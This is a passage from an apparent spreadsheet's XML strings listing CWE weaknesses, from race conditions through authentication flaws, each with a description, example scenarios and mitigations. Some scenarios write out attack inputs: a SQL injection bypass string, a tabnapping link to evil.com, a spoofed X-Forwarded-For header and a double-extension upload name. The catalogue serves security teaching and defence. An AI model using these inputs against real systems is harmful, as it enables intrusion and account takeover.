    <t>Zero-out sensitive memory immediately after use; use SecureString/GuardedString types; disable core dumps for sensitive processes; limit heap dump access.</t>
  </si>
  <si>
    <t>CWE-362</t>
  </si>
  <si>
    <t>Race Condition</t>
  </si>
  <si>
    <t>The software contains a code sequence that runs concurrently, creating unintended interactions when executed simultaneously.</t>
  </si>
  <si>
    <t>TOCTOU: file existence check followed by file open — attacker replaces file with symlink between check and open.</t>
  </si>
  <si>
    <t>Concurrent bank transfer requests both read balance before either debit is written, allowing double-spending.</t>
  </si>
  <si>
    <t>Race condition in session creation allows two sessions with same ID to be created.</t>
  </si>
  <si>
    <t>Use atomic operations and transactions; use file locking (O_CREAT|O_EXCL); use database transactions with appropriate isolation levels; design thread-safe code; test with concurrency tools.</t>
  </si>
  <si>
    <t>CWE-382</t>
  </si>
  <si>
    <t>J2EE: Use of System.exit()</t>
  </si>
  <si>
    <t>A J2EE application calls System.exit(), which terminates the JVM and can cause availability issues.</t>
  </si>
  <si>
    <t>Unhandled exception handler calls System.exit(1), crashing entire application server.</t>
  </si>
  <si>
    <t>User-triggered code path reaches System.exit(0), shutting down shared app server.</t>
  </si>
  <si>
    <t>System.exit() in a servlet causes other deployed applications on the same server to be terminated.</t>
  </si>
  <si>
    <t>Never call System.exit() in J2EE applications; use exception handling and graceful shutdown mechanisms; use static analysis to detect System.exit() usage; replace with proper exception handling.</t>
  </si>
  <si>
    <t>CWE-419</t>
  </si>
  <si>
    <t>Unprotected Primary Channel</t>
  </si>
  <si>
    <t>The primary administrative or sensitive channel lacks adequate protection.</t>
  </si>
  <si>
    <t>Management SNMP community string is 'public' (default), granting read access to all.</t>
  </si>
  <si>
    <t>Admin interface on port 8080 accessible without authentication from any IP.</t>
  </si>
  <si>
    <t>SSH root login enabled with password authentication on internet-facing server.</t>
  </si>
  <si>
    <t>Require authentication for all admin channels; restrict management interfaces to management VLANs; use key-based auth; disable default community strings.</t>
  </si>
  <si>
    <t>CWE-434</t>
  </si>
  <si>
    <t>Unrestricted File Upload</t>
  </si>
  <si>
    <t>The software allows upload of files with dangerous types (PHP, EXE, JSP) without adequate validation.</t>
  </si>
  <si>
    <t>Image upload accepts .php files, allowing webshell upload and execution.</t>
  </si>
  <si>
    <t>Document upload allows .html files, enabling stored XSS via direct file URL access.</t>
  </si>
  <si>
    <t>Archive upload accepts .jar files, executed by server-side processor.</t>
  </si>
  <si>
    <t>Whitelist allowed file types; validate MIME type and magic bytes; store uploads outside web root; rename files server-side; disable script execution in upload directories.</t>
  </si>
  <si>
    <t>CWE-436</t>
  </si>
  <si>
    <t>Interpretation Conflict</t>
  </si>
  <si>
    <t>The software is accessed by multiple entities that interpret the same data in inconsistent ways.</t>
  </si>
  <si>
    <t>URL path interpreted differently by WAF and app server, allowing WAF bypass.</t>
  </si>
  <si>
    <t>JSON key with duplicate entries processed differently by parser and validation layer.</t>
  </si>
  <si>
    <t>HTTP method interpreted as GET by proxy but POST by backend, bypassing method-based access control.</t>
  </si>
  <si>
    <t>Ensure consistent interpretation across all components; test with ambiguous inputs; document expected parsing behaviour; use canonical representations; audit input processing pipelines.</t>
  </si>
  <si>
    <t>CWE-444</t>
  </si>
  <si>
    <t>HTTP Request Smuggling</t>
  </si>
  <si>
    <t>Front-end and back-end servers parse HTTP request boundaries differently.</t>
  </si>
  <si>
    <t>CL.TE smuggling: Content-Length from load balancer, Transfer-Encoding from backend causes boundary confusion.</t>
  </si>
  <si>
    <t>TE.CL: chunked encoding parsed by proxy, content-length by origin causes request boundary confusion.</t>
  </si>
  <si>
    <t>HTTP/2 downgrade to HTTP/1.1 introduces smuggling opportunity via H2.CL vulnerability.</t>
  </si>
  <si>
    <t>Use HTTP/2 end-to-end; configure consistent HTTP parsing; disable Transfer-Encoding: chunked on back-end; use HTTP request smuggling detection tools; keep web server software patched.</t>
  </si>
  <si>
    <t>CWE-451</t>
  </si>
  <si>
    <t>UI Misrepresentation of Critical Information</t>
  </si>
  <si>
    <t>The UI presents information in a misleading way that causes users to make incorrect security decisions.</t>
  </si>
  <si>
    <t>Browser address bar spoofed by homograph attack (pаypal.com vs paypal.com using Cyrillic а).</t>
  </si>
  <si>
    <t>Modal dialog with misleading button labels: 'Cancel' actually confirms dangerous action.</t>
  </si>
  <si>
    <t>TLS error page allows user to proceed without understanding the security risk.</t>
  </si>
  <si>
    <t>Use clear, unambiguous UI for security-critical actions; implement UI security testing; follow secure UX design principles; use confirmation dialogs with clearly stated consequences.</t>
  </si>
  <si>
    <t>CWE-454</t>
  </si>
  <si>
    <t>External Initialization of Trusted Variables</t>
  </si>
  <si>
    <t>Externally-controlled input is used to initialise variables or data stores that are subsequently trusted.</t>
  </si>
  <si>
    <t>PHP $_COOKIE['is_admin'] used to initialise server-side session variable without validation.</t>
  </si>
  <si>
    <t>Configuration parameter from URL used to initialise security-sensitive application mode.</t>
  </si>
  <si>
    <t>Deserialised user-supplied object initialises internal role cache without verification.</t>
  </si>
  <si>
    <t>Initialise all trusted variables from server-side authoritative sources; never derive trusted state from client input; use server-side sessions; validate all initialisation inputs.</t>
  </si>
  <si>
    <t>CWE-472</t>
  </si>
  <si>
    <t>External Control of Assumed-Immutable Web Parameter</t>
  </si>
  <si>
    <t>The application uses web parameters (hidden fields, cookies) assumed to be immutable but controllable by users.</t>
  </si>
  <si>
    <t>Hidden form field &lt;input type='hidden' name='price' value='100'&gt; manipulated to set price=1.</t>
  </si>
  <si>
    <t>Cookie role=user modified to role=admin by attacker.</t>
  </si>
  <si>
    <t>URL parameter discount=0 changed to discount=100 for arbitrary discount.</t>
  </si>
  <si>
    <t>Never trust client-supplied values for security decisions; validate server-side; use server session to store sensitive state; sign critical parameters if they must be client-side.</t>
  </si>
  <si>
    <t>CWE-501</t>
  </si>
  <si>
    <t>Trust Boundary Violation</t>
  </si>
  <si>
    <t>The code mixes trusted and untrusted data in the same data structure.</t>
  </si>
  <si>
    <t>HTTP session stores user-controlled input alongside server-authoritative role data without differentiation.</t>
  </si>
  <si>
    <t>Trusted system config and user preferences merged into single configuration object.</t>
  </si>
  <si>
    <t>Input from external API treated as trusted internal data in data processing pipeline.</t>
  </si>
  <si>
    <t>Clearly separate trusted and untrusted data; validate at trust boundaries; use type-safe containers; document and enforce trust levels in architecture; apply taint analysis.</t>
  </si>
  <si>
    <t>CWE-522</t>
  </si>
  <si>
    <t>Insufficiently Protected Credentials</t>
  </si>
  <si>
    <t>Authentication credentials are transmitted or stored using an insecure method.</t>
  </si>
  <si>
    <t>Password sent in URL parameter: /login?user=admin&amp;pass=secret, logged in server logs.</t>
  </si>
  <si>
    <t>API key stored in browser localStorage, accessible to XSS attacks.</t>
  </si>
  <si>
    <t>Service credentials in Base64 Authorization header over HTTP without TLS.</t>
  </si>
  <si>
    <t>Use HTTPS for all credential transmission; store credentials in secure storage (keychain, secrets manager); avoid credentials in URLs; use short-lived tokens; implement credential rotation.</t>
  </si>
  <si>
    <t>CWE-525</t>
  </si>
  <si>
    <t>Browser Cache Contains Sensitive Information</t>
  </si>
  <si>
    <t>Sensitive pages are cached by browsers or proxies, making them accessible to subsequent users of shared systems.</t>
  </si>
  <si>
    <t>Bank account page cached by browser — back button shows previous user's balance.</t>
  </si>
  <si>
    <t>Medical records page without Cache-Control: no-store cached by shared proxy.</t>
  </si>
  <si>
    <t>Authentication token in cached page accessible to attacker after user logs out.</t>
  </si>
  <si>
    <t>Set Cache-Control: no-store, no-cache for sensitive pages; use Pragma: no-cache; set appropriate Vary headers; test caching behaviour with browser dev tools and proxies.</t>
  </si>
  <si>
    <t>CWE-539</t>
  </si>
  <si>
    <t>Persistent Cookies with Sensitive Information</t>
  </si>
  <si>
    <t>Sensitive data stored in persistent cookies (with Expires/Max-Age) remains accessible after the session ends.</t>
  </si>
  <si>
    <t>Auth token in cookie with Expires=2025-12-31 persists after logout, reusable from other machines.</t>
  </si>
  <si>
    <t>User preferences cookie contains PII in persistent cookie without expiry.</t>
  </si>
  <si>
    <t>Shopping cart cookie with credit card info persists after browser close.</t>
  </si>
  <si>
    <t>Use session cookies (no Expires) for authentication; encrypt sensitive cookie values; implement server-side session invalidation; use HttpOnly, Secure, SameSite attributes.</t>
  </si>
  <si>
    <t>CWE-598</t>
  </si>
  <si>
    <t>Sensitive Data in GET Query String</t>
  </si>
  <si>
    <t>Sensitive data (passwords, tokens) transmitted in GET query strings are logged everywhere.</t>
  </si>
  <si>
    <t>Password reset: GET /reset?token=abc123&amp;email=user@example.com — token in URL logged.</t>
  </si>
  <si>
    <t>Login: GET /login?username=admin&amp;password=secret — credentials in server access logs.</t>
  </si>
  <si>
    <t>API key: GET /api/data?api_key=secretkey123 — key leaked in Referrer header to third parties.</t>
  </si>
  <si>
    <t>Use POST for sensitive data; avoid sensitive data in URLs; use Authorization header for API keys; implement proper referrer policies.</t>
  </si>
  <si>
    <t>CWE-602</t>
  </si>
  <si>
    <t>Client-Side Enforcement of Server-Side Security</t>
  </si>
  <si>
    <t>Security controls implemented only in client-side code can be bypassed by modifying the client.</t>
  </si>
  <si>
    <t>JavaScript disables submit button for unauthorised users — bypassed by removing JS or direct API call.</t>
  </si>
  <si>
    <t>Client-side validation only prevents invalid data — bypassed with browser dev tools or curl.</t>
  </si>
  <si>
    <t>File type check implemented in JavaScript before upload — bypassed by modifying request.</t>
  </si>
  <si>
    <t>Implement all security controls server-side; treat client-side controls as UX only; test all endpoints directly via API; use Burp Suite to test bypass of client-side controls.</t>
  </si>
  <si>
    <t>CWE-628</t>
  </si>
  <si>
    <t>Function Call with Incorrectly Specified Arguments</t>
  </si>
  <si>
    <t>The software calls a function with incorrectly specified arguments, causing unintended behaviour.</t>
  </si>
  <si>
    <t>strcmp(password, stored_hash) called with arguments reversed, always returns non-zero (true).</t>
  </si>
  <si>
    <t>Security function called with wrong argument type; fails silently, allowing bypass.</t>
  </si>
  <si>
    <t>snprintf() buffer size argument hardcoded incorrectly, leading to buffer overflow.</t>
  </si>
  <si>
    <t>Use static analysis tools to detect incorrect function call signatures; write unit tests for all security-critical function calls; use type-safe languages; conduct code review.</t>
  </si>
  <si>
    <t>CWE-642</t>
  </si>
  <si>
    <t>External Control of Critical State Data</t>
  </si>
  <si>
    <t>External input influences critical state data, enabling attackers to manipulate application behaviour.</t>
  </si>
  <si>
    <t>isAdmin=true parameter in POST body directly sets session admin state.</t>
  </si>
  <si>
    <t>ViewState contains serialised user role — manipulated client-side to elevate privileges.</t>
  </si>
  <si>
    <t>JSON Web Token payload role field modified by attacker when signature not verified.</t>
  </si>
  <si>
    <t>Store critical state server-side only; cryptographically sign client-side state; validate all state transitions server-side; never trust client-supplied state for security decisions.</t>
  </si>
  <si>
    <t>CWE-646</t>
  </si>
  <si>
    <t>Reliance on File Name or Extension of Externally-Supplied File</t>
  </si>
  <si>
    <t>Security decisions based on file names or extensions provided by users can be bypassed.</t>
  </si>
  <si>
    <t>File type check based on extension: if filename.endswith('.jpg') — renamed shell.php.jpg bypasses check.</t>
  </si>
  <si>
    <t>Content-Type header from client trusted for file processing decision — spoofed to image/jpeg for PHP file.</t>
  </si>
  <si>
    <t>Double extension: malicious.php.jpg passes extension check, executed as PHP on some servers.</t>
  </si>
  <si>
    <t>Validate file type using magic bytes/MIME analysis; use server-generated filenames; validate with multiple methods; store files outside web root; use antivirus scanning.</t>
  </si>
  <si>
    <t>CWE-653</t>
  </si>
  <si>
    <t>Improper Isolation or Compartmentalization</t>
  </si>
  <si>
    <t>The software doesn't properly isolate components, allowing compromise of one to affect others.</t>
  </si>
  <si>
    <t>Single-tenant database used for multi-tenant app — SQL injection in one tenant reads others' data.</t>
  </si>
  <si>
    <t>All microservices share same DB credentials — compromise of one gives access to all.</t>
  </si>
  <si>
    <t>Frontend and admin functionality in same process — XSS in frontend accesses admin APIs.</t>
  </si>
  <si>
    <t>Apply defence-in-depth through compartmentalisation; use separate DB schemas/instances per tenant; implement network segmentation; use separate credential sets per component.</t>
  </si>
  <si>
    <t>CWE-656</t>
  </si>
  <si>
    <t>Reliance on Security Through Obscurity</t>
  </si>
  <si>
    <t>The software relies on keeping its security mechanisms secret as the primary defence.</t>
  </si>
  <si>
    <t>API uses non-standard port 7474 as the only access control for admin functions.</t>
  </si>
  <si>
    <t>Encryption key security relies solely on the key not being known (no access controls).</t>
  </si>
  <si>
    <t>Admin path /xK92mPq3admin/ considered secure because URL is hard to guess.</t>
  </si>
  <si>
    <t>Implement proper access controls independent of secrecy; conduct threat modelling; assume attackers know the system design (Kerckhoffs's principle); use defence-in-depth.</t>
  </si>
  <si>
    <t>CWE-657</t>
  </si>
  <si>
    <t>Violation of Secure Design Principles</t>
  </si>
  <si>
    <t>The software violates established secure design principles (least privilege, fail-secure, separation of duties).</t>
  </si>
  <si>
    <t>Application runs as root to avoid permission issues, violating least privilege.</t>
  </si>
  <si>
    <t>Fail-open error handling: any exception grants access, violating fail-secure principle.</t>
  </si>
  <si>
    <t>Single admin account handles all privileged operations, violating separation of duties.</t>
  </si>
  <si>
    <t>Apply OWASP Security Design Principles; conduct threat modelling (STRIDE); include security in design reviews; use security architecture patterns; train developers on secure design.</t>
  </si>
  <si>
    <t>CWE-676</t>
  </si>
  <si>
    <t>Use of Potentially Dangerous Function</t>
  </si>
  <si>
    <t>The software invokes a potentially dangerous function that could introduce a vulnerability if not used carefully.</t>
  </si>
  <si>
    <t>C code uses strcpy() instead of strncpy(), allowing buffer overflow on long input.</t>
  </si>
  <si>
    <t>gets() used in C program, unable to limit input length, always unsafe.</t>
  </si>
  <si>
    <t>sprintf() used instead of snprintf() for string formatting, no buffer size limit.</t>
  </si>
  <si>
    <t>Replace dangerous functions with safer alternatives (strncpy, snprintf, fgets); use static analysis to detect dangerous function usage; compile with -Wall -Wformat-security; use memory-safe languages.</t>
  </si>
  <si>
    <t>CWE-693</t>
  </si>
  <si>
    <t>Protection Mechanism Failure</t>
  </si>
  <si>
    <t>A security mechanism that is expected to provide protection against a class of attacks fails.</t>
  </si>
  <si>
    <t>CSRF token present but not verified server-side, rendering it useless.</t>
  </si>
  <si>
    <t>WAF in detection-only mode provides no actual blocking of attacks.</t>
  </si>
  <si>
    <t>Intrusion detection system signature database 2 years out of date, missing recent attack patterns.</t>
  </si>
  <si>
    <t>Regularly test all security controls; use defence-in-depth; verify controls actually block attacks; keep security tool databases updated; conduct red team exercises.</t>
  </si>
  <si>
    <t>CWE-799</t>
  </si>
  <si>
    <t>Improper Control of Interaction Frequency</t>
  </si>
  <si>
    <t>The software does not properly limit the frequency of user interactions.</t>
  </si>
  <si>
    <t>Login endpoint allows unlimited attempts — brute force of passwords without lockout.</t>
  </si>
  <si>
    <t>Password reset sends unlimited reset emails — email bombing/DoS attack.</t>
  </si>
  <si>
    <t>OTP validation endpoint allows unlimited guesses — 6-digit OTP guessable in 1M requests.</t>
  </si>
  <si>
    <t>Implement rate limiting per IP/account; use exponential backoff; implement CAPTCHA after threshold; use account lockout with progressive delay; monitor for high-frequency access patterns.</t>
  </si>
  <si>
    <t>CWE-807</t>
  </si>
  <si>
    <t>Reliance on Untrusted Inputs in a Security Decision</t>
  </si>
  <si>
    <t>The software uses data from untrusted sources to make security decisions without adequate validation.</t>
  </si>
  <si>
    <t>IP address from X-Forwarded-For header (spoofable) used for access control decisions.</t>
  </si>
  <si>
    <t>User-supplied role parameter from request body used to determine permissions.</t>
  </si>
  <si>
    <t>Client-reported timestamp used for time-based access control, easily spoofed.</t>
  </si>
  <si>
    <t>Never use untrusted data for security decisions; validate and canonicalise inputs; use server-side authoritative data; verify claims with independent server-side checks.</t>
  </si>
  <si>
    <t>Critical</t>
  </si>
  <si>
    <t>CWE-841</t>
  </si>
  <si>
    <t>Improper Enforcement of Behavioral Workflow</t>
  </si>
  <si>
    <t>The software doesn't enforce the required sequence of operations in a workflow.</t>
  </si>
  <si>
    <t>Multi-step checkout allows jumping to step 5 (confirm) without completing step 3 (payment).</t>
  </si>
  <si>
    <t>Password reset allows accessing new password page without validating reset token first.</t>
  </si>
  <si>
    <t>Admin workflow allows executing action before required approval step.</t>
  </si>
  <si>
    <t>Implement server-side state machine for workflows; validate prerequisites for each step; store workflow state server-side; test all workflow bypass scenarios.</t>
  </si>
  <si>
    <t>CWE-1021</t>
  </si>
  <si>
    <t>Improper Restriction of Rendered UI Layers (Clickjacking)</t>
  </si>
  <si>
    <t>The application allows itself to be embedded in iframes, enabling clickjacking attacks.</t>
  </si>
  <si>
    <t>Login page embeddable in iframe — attacker overlays transparent iframe over fake button.</t>
  </si>
  <si>
    <t>Admin action button clickjacked by embedding admin panel in attacker-controlled page.</t>
  </si>
  <si>
    <t>Bank transfer confirmation page lacks frame protection — overlaid with fake UI.</t>
  </si>
  <si>
    <t>Set X-Frame-Options: DENY or SAMEORIGIN; use CSP frame-ancestors directive; implement frame-busting JavaScript; prefer CSP over X-Frame-Options.</t>
  </si>
  <si>
    <t>CWE-1022</t>
  </si>
  <si>
    <t>Use of Web Link with window.opener Access</t>
  </si>
  <si>
    <t>A web link opens in a new tab with access to the window.opener property, enabling tabnapping attacks.</t>
  </si>
  <si>
    <t>&lt;a href='https://evil.com' target='_blank'&gt; allows evil.com to redirect the opener page.</t>
  </si>
  <si>
    <t>Tabnapping: attacker's page replaces the opener page with a phishing login prompt.</t>
  </si>
  <si>
    <t>window.opener.location = 'https://phishing.com' executed by third-party site opened via link.</t>
  </si>
  <si>
    <t>Add rel='noopener noreferrer' to all target=_blank links; use Content Security Policy; audit all outbound links in the application; test opener access from linked pages.</t>
  </si>
  <si>
    <t>CWE-1125</t>
  </si>
  <si>
    <t>Excessive Attack Surface</t>
  </si>
  <si>
    <t>The software exposes more functionality, interfaces, or entry points than necessary.</t>
  </si>
  <si>
    <t>Admin REST API exposes CRUD operations for all internal tables, not just those needed by the frontend.</t>
  </si>
  <si>
    <t>Debug endpoints (/debug, /trace, /test) deployed to production increase attack surface.</t>
  </si>
  <si>
    <t>Microservice exposes all methods publicly when only 2 of 10 are needed externally.</t>
  </si>
  <si>
    <t>Apply principle of least exposure; remove unused endpoints; use API gateway to restrict exposed methods; conduct regular attack surface analysis; automate API inventory.</t>
  </si>
  <si>
    <t>A07</t>
  </si>
  <si>
    <t>Authentication Failures</t>
  </si>
  <si>
    <t>CWE-258</t>
  </si>
  <si>
    <t>Empty Password in Configuration File</t>
  </si>
  <si>
    <t>A configuration file contains an empty password or blank credential field.</t>
  </si>
  <si>
    <t>MySQL root account with empty password in /etc/mysql/my.cnf accessible in production.</t>
  </si>
  <si>
    <t>SMTP relay configured with empty password field in postfix/main.cf, accepting unauthenticated relay.</t>
  </si>
  <si>
    <t>Redis deployed with empty requirepass directive, accessible without authentication.</t>
  </si>
  <si>
    <t>Enforce non-empty passwords in all configuration files; use secrets managers; run automated config audits to detect empty credentials; disable default blank-password accounts.</t>
  </si>
  <si>
    <t>CWE-259</t>
  </si>
  <si>
    <t>Hard-coded Password</t>
  </si>
  <si>
    <t>A password is hardcoded in the software.</t>
  </si>
  <si>
    <t>if password == 'backdoor2024': grant_admin_access() in Python source.</t>
  </si>
  <si>
    <t>Cisco device with hardcoded enable password discoverable via strings command on firmware.</t>
  </si>
  <si>
    <t>Java WAR contains hardcoded MySQL root password in JDBC connection string.</t>
  </si>
  <si>
    <t>Remove all hardcoded credentials; use secrets managers; scan code and binaries for hardcoded passwords; conduct firmware security reviews; rotate any exposed credentials immediately.</t>
  </si>
  <si>
    <t>CWE-287</t>
  </si>
  <si>
    <t>Improper Authentication</t>
  </si>
  <si>
    <t>The software performs authentication but the implementation contains flaws that allow bypass.</t>
  </si>
  <si>
    <t>Authentication checks username AND password length but not actual password value.</t>
  </si>
  <si>
    <t>OAuth token validated for format but not checked against authorisation server.</t>
  </si>
  <si>
    <t>Multi-factor auth code accepted for 10 minutes (too long window) allowing replay attacks.</t>
  </si>
  <si>
    <t>Use proven authentication libraries; test auth bypass with automated tools; implement MFA; review auth logic carefully; use authentication frameworks rather than custom implementations.</t>
  </si>
  <si>
    <t>CWE-288</t>
  </si>
  <si>
    <t>Authentication Bypass via Alternate Path</t>
  </si>
  <si>
    <t>Authentication on the primary path is correct but alternate paths bypass it entirely.</t>
  </si>
  <si>
    <t>Web app requires auth but direct database API endpoint has no authentication.</t>
  </si>
  <si>
    <t>Main API secured but legacy /api/v1/ endpoint without authentication still active.</t>
  </si>
  <si>
    <t>Admin console requires MFA but management SSH interface doesn't.</t>
  </si>
  <si>
    <t>Audit all access paths to sensitive functionality; ensure consistent auth enforcement; remove legacy endpoints; use centralised authentication middleware.</t>
  </si>
  <si>
    <t>CWE-289</t>
  </si>
  <si>
    <t>Authentication Bypass by Alternate Name</t>
  </si>
  <si>
    <t>Authentication can be bypassed by using an alternate name or representation for a resource.</t>
  </si>
  <si>
    <t>Auth check compares /ADMIN to /admin but the server serves the same page for both (case insensitive).</t>
  </si>
  <si>
    <t>File access restricted for 'config.php' but not 'CONFIG.PHP' on Windows IIS.</t>
  </si>
  <si>
    <t>NTFS alternate data stream: config.php:$DATA bypasses extension-based auth check.</t>
  </si>
  <si>
    <t>Use case-insensitive comparisons; normalise resource names before auth checks; test with alternate representations; use framework-level access control that handles normalisation.</t>
  </si>
  <si>
    <t>CWE-290</t>
  </si>
  <si>
    <t>Authentication Bypass by Spoofing</t>
  </si>
  <si>
    <t>Authentication can be bypassed by spoofing an identity.</t>
  </si>
  <si>
    <t>IP-based auth bypassed by spoofing X-Forwarded-For: 10.0.0.1 (trusted internal IP).</t>
  </si>
  <si>
    <t>Client certificate spoofed by manipulating header X-SSL-Client-Cert injected at load balancer.</t>
  </si>
  <si>
    <t>Kerberos authentication bypassed via Silver Ticket attack on compromised service account.</t>
  </si>
  <si>
    <t>Don't rely on easily-spoofed attributes for authentication; validate at the correct network layer; use mutual TLS; strip and re-inject trusted headers at the gateway.</t>
  </si>
  <si>
    <t>CWE-291</t>
  </si>
  <si>
    <t>Reliance on IP Address for Authentication</t>
  </si>
  <si>
    <t>The product uses IP address as the primary or sole authentication mechanism.</t>
  </si>
  <si>
    <t>API access granted to any request from 192.168.1.0/24, assuming all internal IPs are trusted.</t>
  </si>
  <si>
    <t>Admin panel accessible from any internal IP without additional credential checks.</t>
  </si>
  <si>
    <t>Webhook processor accepts requests from hardcoded IP whitelist with no HMAC verification.</t>
  </si>
  <si>
    <t>Never rely on IP address alone for authentication; combine with strong credentials or mTLS; implement network segmentation; use zero-trust architecture.</t>
  </si>
  <si>
    <t>CWE-293</t>
  </si>
  <si>
    <t>Using Referer Field for Authentication</t>
  </si>
  <si>
    <t>The product uses the Referer HTTP header for authentication or access control.</t>
  </si>
  <si>
    <t>API endpoint allows access only if Referer header matches https://trusted.com — trivially spoofed.</t>
  </si>
  <si>
    <t>Admin action restricted by checking Referer contains /admin — bypassed by adding ?/admin to attacker URL.</t>
  </si>
  <si>
    <t>File download requires Referer header from the application domain — set by any attacker script.</t>
  </si>
  <si>
    <t>Never use Referer header for authentication or authorisation; use CSRF tokens; implement server-side session-based access control; treat Referer as untrusted.</t>
  </si>
  <si>
    <t>CWE-294</t>
  </si>
  <si>
    <t>Authentication Bypass by Capture-Replay</t>
  </si>
  <si>
    <t>Authentication tokens or credentials are captured and replayed to impersonate a legitimate user.</t>
  </si>
  <si>
    <t>Session cookie captured from HTTP traffic replayed after victim logs out — server still accepts it.</t>
  </si>
  <si>
    <t>NTLM hash captured via responder replayed to authenticate to internal services.</t>
  </si>
  <si>
    <t>API key captured from log file replayed to make authenticated requests.</t>
  </si>
  <si>
    <t>Use short-lived tokens with nonces; implement server-side token invalidation; use TLS to prevent capture; implement replay detection via nonce/timestamp; use token binding.</t>
  </si>
  <si>
    <t>CWE-295</t>
  </si>
  <si>
    <t>Improper Certificate Validation</t>
  </si>
  <si>
    <t>The software doesn't properly validate TLS certificates.</t>
  </si>
  <si>
    <t>Android app: TrustManager.checkServerTrusted() has empty body, accepts any certificate.</t>
  </si>
  <si>
    <t>Python requests.get(url, verify=False) — SSL verification disabled.</t>
  </si>
  <si>
    <t>Corporate app trusts all certificates in custom trust store including malicious ones.</t>
  </si>
  <si>
    <t>Use platform certificate validation; implement certificate pinning for mobile; remove disabled SSL verification before production; regularly audit SSL configuration.</t>
  </si>
  <si>
    <t>CWE-297</t>
  </si>
  <si>
    <t>Certificate Host Mismatch</t>
  </si>
  <si>
    <t>The software validates a certificate's authenticity but doesn't verify the hostname matches.</t>
  </si>
  <si>
    <t>HTTPS client accepts certificate for *.evil.com when connecting to api.bank.com.</t>
  </si>
  <si>
    <t>Mail client accepts any valid certificate regardless of hostname for SMTP.</t>
  </si>
  <si>
    <t>API client checks certificate is signed by trusted CA but not that CN matches the endpoint.</t>
  </si>
  <si>
    <t>Enable hostname verification; use HttpsURLConnection correctly; never use ALLOW_ALL_HOSTNAME_VERIFIER; test with certificates for wrong hostnames.</t>
  </si>
  <si>
    <t>CWE-298</t>
  </si>
  <si>
    <t>Improper Validation of Certificate Expiry</t>
  </si>
  <si>
    <t>The software does not check whether a certificate has expired before accepting it.</t>
  </si>
  <si>
    <t>HTTPS client accepts expired TLS certificate because expiry check is disabled.</t>
  </si>
  <si>
    <t>S/MIME email library processes signed message with expired signing certificate.</t>
  </si>
  <si>
    <t>Internal CA certificate expired but application continues to trust it without alerting.</t>
  </si>
  <si>
    <t>Enable certificate expiry validation; monitor certificate expiry dates; implement automated renewal (Let's Encrypt, cert-manager); test with expired certificates.</t>
  </si>
  <si>
    <t>CWE-299</t>
  </si>
  <si>
    <t>Improper Check for Certificate Revocation</t>
  </si>
  <si>
    <t>The software does not check whether a certificate has been revoked.</t>
  </si>
  <si>
    <t>App accepts compromised client certificate because OCSP/CRL check is not implemented.</t>
  </si>
  <si>
    <t>TLS client doesn't check CRL — stolen certificate used for months after issuer revoked it.</t>
  </si>
  <si>
    <t>mTLS server doesn't verify client certificate against CRL, allowing use of revoked certs.</t>
  </si>
  <si>
    <t>Implement OCSP stapling or CRL checks for all certificate validation; use short-lived certificates; monitor revocation status; deploy OCSP must-staple for servers.</t>
  </si>
  <si>
    <t>CWE-300</t>
  </si>
  <si>
    <t>Channel Accessible by Non-Endpoint</t>
  </si>
  <si>
    <t>A communication channel intended for specific endpoints can be accessed or intercepted by unintended parties.</t>
  </si>
  <si>
    <t>WebSocket channel for authenticated users accessible by any script on same origin.</t>
  </si>
  <si>
    <t>Internal message queue consumed by any process with network access.</t>
  </si>
  <si>
    <t>IPC pipe readable by all local users due to insufficient permissions.</t>
  </si>
  <si>
    <t>Authenticate both endpoints; use mutual TLS for service-to-service communication; implement channel-level access controls; test for channel accessibility from unintended principals.</t>
  </si>
  <si>
    <t>CWE-302</t>
  </si>
  <si>
    <t>Authentication Bypass by Assumed-Immutable Data</t>
  </si>
  <si>
    <t>The authentication scheme assumes certain data is immutable and doesn't re-validate it on each request.</t>
  </si>
  <si>
    <t>Role stored in client-side cookie assumed not to change — modified by attacker.</t>
  </si>
  <si>
    <t>JWT payload role cached server-side after initial validation, allowing stale privilege escalation.</t>
  </si>
  <si>
    <t>Session user object not reloaded from DB — privilege revocation not effective until session expiry.</t>
  </si>
  <si>
    <t>Re-validate authentication state server-side on each sensitive operation; use short-lived tokens; implement real-time privilege revocation.</t>
  </si>
  <si>
    <t>CWE-303</t>
  </si>
  <si>
    <t>Incorrect Implementation of Authentication Algorithm</t>
  </si>
  <si>
    <t>The authentication algorithm is implemented incorrectly, introducing vulnerabilities.</t>
  </si>
  <si>
    <t>Custom JWT implementation uses string comparison instead of constant-time comparison for HMAC.</t>
  </si>
  <si>
    <t>Password comparison with == instead of timing-safe compare, enabling timing oracle.</t>
  </si>
  <si>
    <t>Hash comparison exits at first differing byte, leaking information via response timing.</t>
  </si>
  <si>
    <t>Use well-tested cryptographic libraries; use timing-safe comparison functions (hmac.compare_digest, MessageDigest.isEqual); never implement crypto primitives from scratch.</t>
  </si>
  <si>
    <t>CWE-304</t>
  </si>
  <si>
    <t>Missing Critical Step in Authentication</t>
  </si>
  <si>
    <t>The authentication process skips a required step.</t>
  </si>
  <si>
    <t>Two-factor auth code checked only if isRemembered flag is false — flag manipulable.</t>
  </si>
  <si>
    <t>Email verification step skipped in OAuth flow due to missing check.</t>
  </si>
  <si>
    <t>Password reset token expiry check absent — expired tokens accepted indefinitely.</t>
  </si>
  <si>
    <t>Document and enforce all required authentication steps; use state machines for auth workflows; test all paths including short-circuit paths.</t>
  </si>
  <si>
    <t>CWE-305</t>
  </si>
  <si>
    <t>Authentication Bypass by Primary Weakness</t>
  </si>
  <si>
    <t>A weakness in a primary security mechanism is exploited to bypass authentication entirely.</t>
  </si>
  <si>
    <t>SQL injection in login query: ' OR '1'='1 bypasses password check.</t>
  </si>
  <si>
    <t>Weak password hashing (MD5) cracked offline, enabling credential reuse.</t>
  </si>
  <si>
    <t>Session fixation: pre-authenticated session ID used post-login without regeneration.</t>
  </si>
  <si>
    <t>Address underlying weaknesses (parameterised queries, strong hashing, session regeneration); conduct threat modelling; apply defence-in-depth.</t>
  </si>
  <si>
    <t>CWE-306</t>
  </si>
  <si>
    <t>Missing Authentication for Critical Function</t>
  </si>
  <si>
    <t>Critical functionality is accessible without any authentication requirement.</t>
  </si>
  <si>
    <t>Admin API /api/admin/users accessible without any authentication token.</t>
  </si>
  <si>
    <t>Password reset endpoint executes reset with only email address, no token verification.</t>
  </si>
  <si>
    <t>Debug endpoint /actuator/shutdown reachable without credentials from network.</t>
  </si>
  <si>
    <t>Require authentication for all sensitive operations; apply authentication middleware globally; use deny-by-default; test all endpoints without credentials.</t>
  </si>
  <si>
    <t>CWE-307</t>
  </si>
  <si>
    <t>Improper Restriction of Authentication Attempts</t>
  </si>
  <si>
    <t>No rate limiting or lockout on authentication attempts enables brute force attacks.</t>
  </si>
  <si>
